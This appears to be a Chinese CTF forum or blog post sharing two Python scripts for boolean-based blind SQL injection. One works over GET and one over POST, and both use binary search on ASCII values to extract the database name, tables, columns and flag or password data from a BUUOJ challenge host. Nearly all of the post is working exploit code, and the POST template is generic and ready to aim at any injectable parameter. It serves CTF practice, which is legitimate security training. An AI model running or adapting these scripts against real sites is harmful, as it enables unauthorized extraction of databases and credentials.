在网上看了各个师傅们的代码,结合写了一下,提高输出效率又尽可能的使代码简约
GET型
import requests
url = "http://4f4e08ab-13d3-4d32-ab94-94955a536286.node5.buuoj.cn:81/search.php?id=0^"
res = ""
par = "?id=0^"
for i in range(160,250):
print("第{0}个字符".format(i))
begin = 33
end = 130
mid = (begin + end) >>1
while begin < end:
# 获取当前使用的数据库
# payload = "(ascii(substr((select(database())),{0},1))>{1})".format(i,mid)
# 获取当前数据库的所有表
# payload = "(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),{},1))>{})".format(i,mid)
# 获取表的字段
# payload = "(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),{},1))>{})".format(i,mid)
# 获取flag表的数据
payload = "(ascii(substr((select(group_concat(password))from(F1naI1y)),{},1))>{})".format(i,mid)
payload = url+payload
response = requests.get(payload)
if "NO" in response.text:
begin = mid +1
else:
end = mid
mid = (end + begin) >>1
if chr(mid) =="!":
break
res += chr(mid)
print(res)
print("结果:"+res)
POST型
其实大体上差不多只是改几个地方就好了
import requests
import time
rest = "" # 要提前设置
url = "" #网址
payload = {"": ""} #参数记得加
par = '' #这是根据具体问题要加的前置条件
for i in range(1, 100):
print('正在获取第 %d 个字符' % i)
begin = 33
end = 130
middle = (begin+end) >> 1 # 记得加括号 结果就是对begin+end除以2取整数
while begin < end:
payload[""] = "{0}(ascii(substr((select(flag)from(flag)),{1},1))>{2})".format(par,i, middle) # 别忘了参数
resp = requests.post(url, data=payload) # data传入的必须是一个字典
if "Hello" in resp.text:
begin = middle + 1
else:
end = middle
middle = (begin + end) >> 1#重新对middle赋值
time.sleep(0.001) #避免有时候报错可以注释掉
if chr(middle) == "!":
break
rest += chr(middle)#返回值是当前对应的 ASCII 字符
print("结果:" + rest)
print(rest)
感谢各位师傅